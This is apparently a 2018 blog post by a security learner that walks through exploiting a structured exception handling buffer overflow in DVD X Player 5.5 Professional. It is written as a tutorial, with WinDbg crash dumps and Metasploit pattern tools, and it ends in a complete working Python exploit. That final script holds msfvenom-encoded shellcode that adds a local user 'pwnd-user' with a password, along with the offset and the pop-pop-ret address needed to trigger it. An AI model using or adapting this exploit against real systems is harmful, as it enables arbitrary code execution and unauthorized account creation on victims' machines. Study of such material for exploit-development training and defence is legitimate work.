Thursday, January 25, 2018

Beginning Windows Exploit Development - Exploiting Structured Exception Handling (SEH)

This series of posts is based on me looking at expanding my knowledge on Windows Exploit Development. This post is based on understanding exploiting the SEH based mechanism in order to have a successful buffer overflow.

Before we get started, I must state clearly that this information is based on the guidance provided from fuzzysecurity.com website as shown in the references section.

For some folks reading my material may be easier, for others reading the material from Fuzy Security will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.

Similar to the FuzzySecurity blog post, we will be using DVDX player 5.5 Professional

First up, generate the player list file (".plf") file that allows us to overrun the buffer. The code below helps us to achieve this.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
def Exploit_Code():
 malicious_file = 'SecurityNik.plf';
 myBuffer = 'A' * 2000
 fp = open(malicious_file,'w')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

Once the file is created, and fed to DVDX Player, with the attached debugger we get

1
2
3
4
5
6
7
(488.164): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=042c0a60 edx=00000042 esi=042c0180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??              ???

From above we see our EIP has been overwritten by "41414141" which is basically our As.

If we take a look at our "!exchain", we see our Next SEH and SE Handler have been overwritten with "41414141"

1
2
3
0:000> !exchain
0012f24c: 41414141
Invalid exception stack at 41414141

Further confirming the above, if we take a look at the Thread Information Block (TEB), we see:

1
2
3
4
5
6
7
8
9
0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 e0 fd 7f 00 00 00 00 ................
003b:00000020  88 04 00 00 64 01 00 00-00 00 00 00 00 00 00 00 ....d...........
003b:00000030  00 f0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  60 9c db e1 00 00 00 00-00 00 00 00 00 00 00 00 `...............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

When we dump the contents of address "0x0012f24c" we get:

1
2
3
4
5
6
7
8
9
0:000> d 0012f24c
0012f24c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f25c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f26c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f27c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f28c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f29c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

At this point we see both the nSEH and the SE Handler has been overwritten.

Leveraging our trusted "pattern_create.rb" to generate a pattern of 2000 bytes, and providing it to the code we get.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb --length 2000

and the modified code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
def Exploit_Code():
 malicious_file = 'SecurityNik.plf';
 myBuffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co'
 fp = open(malicious_file,'w')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

When the new file is fed to DVDX we get:

1
2
3
4
5
6
7
(46c.2a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03e80a60 edx=00000042 esi=03e80180 edi=6405362c
eip=37694136 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
37694136 ??              ???

Looking at the "!exchain" output we get:

1
2
3
0:000> !exchain
0012f24c: 41347541
Invalid exception stack at 33754132


Looking at the ASCII value of "33754132" we get. Do remember the byte order of this value needs to be reorder. So the new value should be "0x32417533".

When this value is fed to WinDbg's ".formats" we see the following output

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
0:000> .formats 0x32417533
Evaluate expression:
  Hex:     32417533
  Decimal: 843150643
  Octal:   06220272463
  Binary:  00110010 01000001 01110101 00110011
  Chars:   2Au3
  Time:    Thu Sep 19 12:30:43 1996
  Float:   low 1.12607e-008 high 0
  Double:  4.16572e-315

When "2Au3" is fed to Metasploit's "pattern_offset.rb" we get:
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb --length 2000 --query 2Au3
[*] Exact match at offset 608

At this point we can conclude our "Next SEH Record" is at offset 608. This means our SE Handler is at offset 612, since it is 4 bytes past the Next SEH.

Leveraging "findjmp2.exe" to identify a pop pop return sequence, we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
C:\Program Files\Aviosoft\DVD X Player 5.5 Professional>e:\findjump2.exe EPG.dll  eax | findstr /i pop
0x61625534      pop eax - pop - retbis
0x61629759      pop eax - pop - ret
0x6162E7A6      pop eax - pop - ret
0x6162F5F2      pop eax - pop - ret
0x61632B3B      pop eax - pop - retbis
0x61632DDA      pop eax - pop - ret
0x616339BB      pop eax - pop - retbis
0x616339DD      pop eax - pop - retbis
0x61633F3B      pop eax - pop - retbis
0x616347E5      pop eax - pop - ret
0x616348C9      pop eax - pop - retbis
0x61636E07      pop eax - pop - retbis
0x616384EE      pop eax - pop - retbis
0x61638890      pop eax - pop - ret
0x6163A654      pop eax - pop - ret
0x6163AB3E      pop eax - pop - ret
0x6163B482      pop eax - pop - ret
0x6163B9EE      pop eax - pop - retbis
0x6163E206      pop eax - pop - ret
0x6163E54F      pop eax - pop - retbis
0x61641D08      pop eax - pop - ret
0x61642270      pop eax - pop - retbis
0x61642A8E      pop eax - pop - ret
0x61643B6B      pop eax - pop - ret
0x61643BAD      pop eax - pop - retbis
0x61643CCC      pop eax - pop - retbis
0x61643D73      pop eax - pop - retbis
0x6164526D      pop eax - pop - retbis

Selecting the entry at "0x61629759" and finalizing the code we get:

Now that we have everything set, we will generate payload that will allow us add a user to the system. This user will be named "pwnd-user".

Let's first do a "net user" to verify this user does not exist.

1
2
3
4
5
6
7
8
C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SecurityNik              SUPPORT_388945a0
The command completed successfully.

Time for the final code


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
"""
 This code is part of me learning exploit development in a Windows Environment
 Author: Nik Alleyne
 Author Blog: http://securitynik.blogspot.com
 Date: 2018-01-10
 Exploit is for DVDX Player 5.5 Professional

"""


def Exploit_Code():
 malicious_file = 'SecurityNik.plf';

 #root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="net user pwnd-user Password1 /add" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D\x1A' --format c --iterations 1 > msfvenom_add_user.txt

 shellcode = (
  "\xba\x2d\x45\x8d\x97\xd9\xcf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
  "\x37\x31\x57\x14\x03\x57\x14\x83\xc7\x04\xcf\xb0\x71\x7f\x8d"
  "\x3b\x8a\x80\xf1\xb2\x6f\xb1\x31\xa0\xe4\xe2\x81\xa2\xa9\x0e"
  "\x6a\xe6\x59\x84\x1e\x2f\x6d\x2d\x94\x09\x40\xae\x84\x6a\xc3"
  "\x2c\xd6\xbe\x23\x0c\x19\xb3\x22\x49\x47\x3e\x76\x02\x0c\xed"
  "\x67\x27\x58\x2e\x03\x7b\x4d\x36\xf0\xcc\x6c\x17\xa7\x47\x37"
  "\xb7\x49\x8b\x4c\xfe\x51\xc8\x68\x48\xe9\x3a\x07\x4b\x3b\x73"
  "\xe8\xe0\x02\xbb\x1b\xf8\x43\x7c\xc3\x8f\xbd\x7e\x7e\x88\x79"
  "\xfc\xa4\x1d\x9a\xa6\x2f\x85\x46\x56\xfc\x50\x0c\x54\x49\x16"
  "\x4a\x79\x4c\xfb\xe0\x85\xc5\xfa\x26\x0c\x9d\xd8\xe2\x54\x46"
  "\x40\xb2\x30\x29\x7d\xa4\x9a\x96\xdb\xae\x37\xc3\x51\xed\x5d"
  "\x12\xe7\x8b\x10\x14\xf7\x93\x04\x7c\xc6\x18\xcb\xfb\xd7\xca"
  "\xaf\xf3\x9d\x57\x99\x9b\x7b\x02\x9b\xc6\x7b\xf8\xd8\xfe\xff"
  "\x09\xa1\x05\x1f\x78\xa4\x42\xa7\x90\xd4\xdb\x42\x97\x4b\xdc"
  "\x46\xf9\x0e\x56\x49\x73\xa2\xf3\xfb\x5b\x34\x8c\x95\xff\x99"
  "\x07\x19\x65\x90\xc7\x8d\x04\x27\x74\x59\xa8\xb5\x1e\x94\x16"
  "\x15\xbf\xb2\x32\x69")

 # Using pop pop return at address 0x61629759 in EPG.DLL
 myBuffer = 'A' * 608 + '\xeb\x06\x90\x90' + '\x59\x97\x62\x61' + '\x90' * 20 + shellcode
 fp = open(malicious_file,'w')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

Once the created file is fed to DVDX Player, the application showed a few errors. However, in the background our user "pwnd-user" was created.


1
2
3
4
5
6
7
8
C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
pwnd-user                SecurityNik              SUPPORT_388945a0
The command completed successfully.


At this point, the post can be completed. However, let's take a quick last past to get a better understanding of what transpired.

First up attach to the DVDX Player, then feed the file to the application. Once it crashes, we get:

1
2
3
4
5
6
7
(288.7a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03f50a60 edx=00000042 esi=03f50180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??              ???


Next up, let's look at the TIB "fs:[0]" to see where the SE Chain starts:

1
2
3
4
5
6
7
8
9
0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................
003b:00000020  88 02 00 00 a0 07 00 00-00 00 00 00 00 00 00 00 ................
003b:00000030  00 b0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  b8 44 da e1 00 00 00 00-00 00 00 00 00 00 00 00 .D..............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

From the above, we see the chain starts at "0x0012f24c"

Dumping the memory at this location, we get:

1
2
3
4
5
6
7
8
9
0:000> d 0012f24c
0012f24c  eb 06 90 90 59 97 62 61-90 90 90 90 90 90 90 90  ....Y.ba........
0012f25c  90 90 90 90 90 90 90 90-90 90 90 90 ba 2d 45 8d  .............-E.
0012f26c  97 d9 cf d9 74 24 f4 5f-2b c9 b1 37 31 57 14 03  ....t$._+..71W..
0012f27c  57 14 83 c7 04 cf b0 71-7f 8d 3b 8a 80 f1 b2 6f  W......q..;....o
0012f28c  b1 31 a0 e4 e2 81 a2 a9-0e 6a e6 59 84 1e 2f 6d  .1.......j.Y../m
0012f29c  2d 94 09 40 ae 84 6a c3-2c d6 be 23 0c 19 b3 22  -..@..j.,..#..."
0012f2ac  49 47 3e 76 02 0c ed 67-27 58 2e 03 7b 4d 36 f0  IG>v...g'X..{M6.
0012f2bc  cc 6c 17 a7 47 37 b7 49-8b 4c fe 51 c8 68 48 e9  .l..G7.I.L.Q.hH.

From above we see our Next SEH overwritten with "0x909006eb". This is followed by our SEH handler being overwritten with "0x61629759". Next up we see our NOPs (0x90) followed by our shellcode.

We can also verify that Next SEH and SE Handler have been overwritten by leveraging the "!exchain" extension as show below:

1
2
3
4
5
0:000> !exchain
0012f24c: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll - 
EPG!Ordinal1+23919 (61629759)
Invalid exception stack at 909006eb

That's it for this post.


References:
https://www.fuzzysecurity.com/tutorials/expDev/3.html

No comments:

Post a Comment